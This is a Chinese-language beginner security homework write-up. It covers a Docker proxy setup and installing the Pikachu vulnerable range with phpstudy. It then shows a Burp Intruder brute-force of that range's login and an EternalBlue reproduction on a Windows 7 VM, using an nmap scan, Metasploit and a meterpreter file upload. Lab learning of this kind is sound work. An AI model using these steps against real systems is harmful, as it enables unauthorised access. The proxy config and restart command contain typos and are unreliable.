网络安全初级第一次作业
一,docker搭建和挂载vpm
1.安装 Docker
apt-get install docker.io docker-compose
2.创建文件
mkdir /etc/docker.service.d
vim /etc/docker.service.d/http-proxy.conf
3.改写文件配置
[Service]
Environment="HTTP_PROXY=http://192.168.10.103:7890"
Environment=“HTTPS_PROXY=http://192.168.0.5:7890”
Environment=“NO_PROXY=localhost,127.0.0.1”
4.重启
systemctl restat docker
二、小皮面板搭建pikachu靶场
-
下载小皮面板
访问官网 小皮面板(phpstudy) - 让天下没有难配的服务器环境!小皮面板,好用安全稳定。是一款支持Windows系统与Linux系统的服务器运维管理面板。https://www.xp.cn/php-study 下载适用于 Windows 的小皮面板安装包,并完成安装过程。
-
在小皮面板安装好后,我们查看刚才选择的安装路径的文件夹,会发现有一个www目录
-
配置靶场源码,我们将刚才下好的pikachu靶场的源码压缩包移动到该文件夹内
-
我们回到小皮面板,点击数据库,查看 用户名,密码,并记住(密码鼠标移动到上面即可查看),这里两者都是 “root”
-
我们进入 /pikachu/inc 文件夹,并打开 config.inc.php 文件,按照提示,填入我们刚才查看的账号和密码,别的地方不要动,并保存文件
-
我们再次返回小皮面板,点击网站,再点击左上角的创建网站,然后填入内容如图所示,路径那里选择我们刚才解压的pikachu文件夹的路径,php版本选择5.6.9
三、bp使用爆破模块破解pikachu的登陆密码
1.拦截网站信息
2.将拦截到的内容发送到Intruder,首先选择clear$,然后分别选中username和password输入的数据进行标记,点击Add$,最后选择攻击方式Cluster bomb
3.添加username与password集
4.开始爆破
5.找到密码,登录成功
四、使用msf复现永恒之蓝
首先我们关闭win7的防火墙
端口扫描
nmap -sV 192.168.150.130
利用模块
┌──(root㉿kali)-[~]
└─# msfconsole 进入工具
找到红框里的那句话,说明极大可能存在永恒之蓝漏洞
利用永恒之蓝模块
获取cmd
上传文件
C:\Windows\system32>exit
exit
meterpreter > upload /home/Desktop/index.html c://
[*] Uploading : /home/Desktop/index.html -> c://\index.html
[*] Completed : /home/Desktop/index.html -> c://\index.html